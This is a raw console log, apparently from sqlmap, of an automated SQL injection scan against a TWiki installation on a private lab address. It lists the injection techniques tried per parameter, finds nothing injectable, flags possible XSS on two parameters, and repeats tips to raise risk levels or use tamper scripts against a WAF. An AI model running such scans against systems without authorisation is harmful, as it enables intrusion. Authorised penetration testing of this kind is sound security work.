[19:09:58] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:09:58] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:09:58] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:09:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:09:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:09:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:10:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:10:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:10:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:10:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:10:02] [INFO] testing 'MySQL inline queries' | |
[19:10:02] [INFO] testing 'PostgreSQL inline queries' | |
[19:10:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:10:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:10:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:10:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:10:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:10:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:10:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:10:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:10:06] [INFO] testing 'Oracle AND time-based blind' | |
[19:10:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:10:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:10:23] [WARNING] GET parameter 'param1' is not injectable | |
[19:10:23] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:10:23] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:10:23] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:10:23] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:10:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:10:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:10:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:10:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:10:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:10:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:10:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:10:28] [INFO] testing 'MySQL inline queries' | |
[19:10:28] [INFO] testing 'PostgreSQL inline queries' | |
[19:10:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:10:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:10:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:10:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:10:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:10:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:10:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:10:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:10:32] [INFO] testing 'Oracle AND time-based blind' | |
[19:10:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:10:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:10:48] [WARNING] GET parameter 'param2' is not injectable | |
[19:10:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.20' | |
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.19&rev2=1.18' | |
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.18' | |
[19:10:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.20¶m2=1.20' | |
URL 82: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?unlock=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:10:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?unlock=on' | |
[19:10:48] [INFO] testing connection to the target URL | |
[19:10:49] [INFO] testing if the target URL is stable | |
[19:10:49] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:10:49] [INFO] testing if GET parameter 'unlock' is dynamic | |
[19:10:50] [WARNING] GET parameter 'unlock' does not appear dynamic | |
[19:10:50] [WARNING] heuristic (basic) test shows that GET parameter 'unlock' might not be injectable | |
[19:10:50] [INFO] testing for SQL injection on GET parameter 'unlock' | |
[19:10:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:10:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:10:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:10:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:10:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:10:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:10:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:10:55] [INFO] testing 'MySQL inline queries' | |
[19:10:56] [INFO] testing 'PostgreSQL inline queries' | |
[19:10:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:10:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:10:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:10:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:10:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:10:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:11:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:11:01] [INFO] testing 'Oracle AND time-based blind' | |
[19:11:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:11:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:11:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:11:21] [WARNING] GET parameter 'unlock' is not injectable | |
[19:11:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 83: | |
GET http://192.168.1.113:80/twiki/bin/rename/Main/WebHome?currentwebonly=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:11:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/Main/WebHome?currentwebonly=on' | |
[19:11:21] [INFO] testing connection to the target URL | |
[19:11:21] [INFO] testing if the target URL is stable | |
[19:11:22] [INFO] target URL is stable | |
[19:11:22] [INFO] testing if GET parameter 'currentwebonly' is dynamic | |
[19:11:22] [WARNING] GET parameter 'currentwebonly' does not appear dynamic | |
[19:11:22] [WARNING] heuristic (basic) test shows that GET parameter 'currentwebonly' might not be injectable | |
[19:11:22] [INFO] testing for SQL injection on GET parameter 'currentwebonly' | |
[19:11:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:11:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:11:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:11:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:11:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:11:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:11:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:11:26] [INFO] testing 'MySQL inline queries' | |
[19:11:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:11:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:11:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:11:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:11:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:11:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:11:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:11:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:11:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:11:31] [INFO] testing 'Oracle AND time-based blind' | |
[19:11:33] [INFO] GET parameter 'currentwebonly' seems to be 'Oracle AND time-based blind' injectable | |
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y | |
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y | |
[19:11:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[19:11:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[19:11:47] [INFO] checking if the injection point on GET parameter 'currentwebonly' is a false positive | |
[19:11:48] [WARNING] false positive or unexploitable injection point detected | |
[19:11:48] [WARNING] GET parameter 'currentwebonly' is not injectable | |
[19:11:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 84: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&web=all;®ex=on&search=Web *Home[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:11:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&web=all;®ex=on&search=Web *Home[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:11:48] [INFO] testing connection to the target URL | |
[19:11:50] [INFO] testing if the target URL is stable | |
[19:11:50] [INFO] target URL is stable | |
[19:11:50] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:11:51] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:11:52] [INFO] URI parameter '#1*' is dynamic | |
[19:11:52] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:11:53] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:11:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:11:54] [WARNING] reflective value(s) found and filtering out | |
[19:12:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:12:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:12:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:12:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:12:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:12:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:12:28] [INFO] testing 'MySQL inline queries' | |
[19:12:29] [INFO] testing 'PostgreSQL inline queries' | |
[19:12:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:12:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:12:34] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) | |
[19:12:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:12:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:12:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:12:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:12:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:13:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:13:07] [INFO] testing 'Oracle AND time-based blind' | |
[19:13:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:13:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:14:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:14:19] [WARNING] URI parameter '#1*' is not injectable | |
[19:14:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 85: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebNotify?t=1441456882 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:14:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebNotify?t=1441456882' | |
[19:14:19] [INFO] testing connection to the target URL | |
[19:14:20] [INFO] testing if the target URL is stable | |
[19:14:20] [INFO] target URL is stable | |
[19:14:20] [INFO] testing if GET parameter 't' is dynamic | |
[19:14:20] [WARNING] GET parameter 't' does not appear dynamic | |
[19:14:21] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:14:21] [INFO] testing for SQL injection on GET parameter 't' | |
[19:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:14:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:14:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:14:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:14:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:14:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:14:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:14:24] [INFO] testing 'MySQL inline queries' | |
[19:14:24] [INFO] testing 'PostgreSQL inline queries' | |
[19:14:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:14:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:14:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:14:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:14:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:14:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:14:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:14:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:14:27] [INFO] testing 'Oracle AND time-based blind' | |
[19:14:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:14:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:14:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:14:39] [WARNING] GET parameter 't' is not injectable | |
[19:14:39] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 86: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Notify[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:14:39] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Notify[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:14:39] [INFO] testing connection to the target URL | |
[19:14:40] [INFO] testing if the target URL is stable | |
[19:14:40] [INFO] target URL is stable | |
[19:14:40] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:14:40] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:14:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:14:41] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:14:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:14:41] [WARNING] reflective value(s) found and filtering out | |
[19:14:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:14:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:14:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:14:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:14:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:14:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:14:44] [INFO] testing 'MySQL inline queries' | |
[19:14:44] [INFO] testing 'PostgreSQL inline queries' | |
[19:14:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:14:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:14:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:14:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:14:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:14:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:14:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:14:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:14:48] [INFO] testing 'Oracle AND time-based blind' | |
[19:14:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:14:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:14:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:15:01] [WARNING] URI parameter '#1*' is not injectable | |
[19:15:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 87: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:15:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?skin=print' | |
[19:15:01] [INFO] testing connection to the target URL | |
[19:15:01] [INFO] testing if the target URL is stable | |
[19:15:02] [INFO] target URL is stable | |
[19:15:02] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:15:02] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:15:03] [INFO] GET parameter 'skin' is dynamic | |
[19:15:03] [INFO] heuristics detected web page charset 'ascii' | |
[19:15:03] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:15:03] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:15:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:15:03] [WARNING] reflective value(s) found and filtering out | |
[19:15:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:15:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:15:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:15:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:15:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:15:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:15:06] [INFO] testing 'MySQL inline queries' | |
[19:15:06] [INFO] testing 'PostgreSQL inline queries' | |
[19:15:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:15:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:15:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:15:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:15:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:15:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:15:09] [INFO] testing 'Oracle AND time-based blind' | |
[19:15:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:15:10] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:15:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:15:21] [WARNING] GET parameter 'skin' is not injectable | |
[19:15:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 88: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.8&rev2=1.7 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:15:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.8&rev2=1.7' | |
[19:15:21] [INFO] testing connection to the target URL | |
[19:15:21] [INFO] testing if the target URL is stable | |
[19:15:22] [INFO] target URL is stable | |
[19:15:22] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:15:22] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:15:22] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:15:22] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:15:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:15:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:15:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:15:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:15:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:15:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:15:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:15:25] [INFO] testing 'MySQL inline queries' | |
[19:15:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:15:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:15:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:15:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:15:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:15:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:15:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:15:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:15:29] [INFO] testing 'Oracle AND time-based blind' | |
[19:15:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:15:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:15:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:15:42] [WARNING] GET parameter 'rev1' is not injectable | |
[19:15:42] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:15:42] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:15:42] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:15:42] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:15:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:15:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:15:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:15:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:15:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:15:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:15:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:15:46] [INFO] testing 'MySQL inline queries' | |
[19:15:46] [INFO] testing 'PostgreSQL inline queries' | |
[19:15:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:15:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:15:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:15:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:15:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:15:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:15:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:15:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:15:49] [INFO] testing 'Oracle AND time-based blind' | |
[19:15:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:15:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:16:02] [WARNING] GET parameter 'rev2' is not injectable | |
[19:16:02] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 89: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.7 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:16:02] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.7' | |
[19:16:02] [INFO] testing connection to the target URL | |
[19:16:03] [INFO] testing if the target URL is stable | |
[19:16:04] [INFO] target URL is stable | |
[19:16:04] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:16:04] [INFO] confirming that GET parameter 'rev' is dynamic | |
[19:16:04] [INFO] GET parameter 'rev' is dynamic | |
[19:16:04] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:16:04] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:16:04] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:16:04] [WARNING] reflective value(s) found and filtering out | |
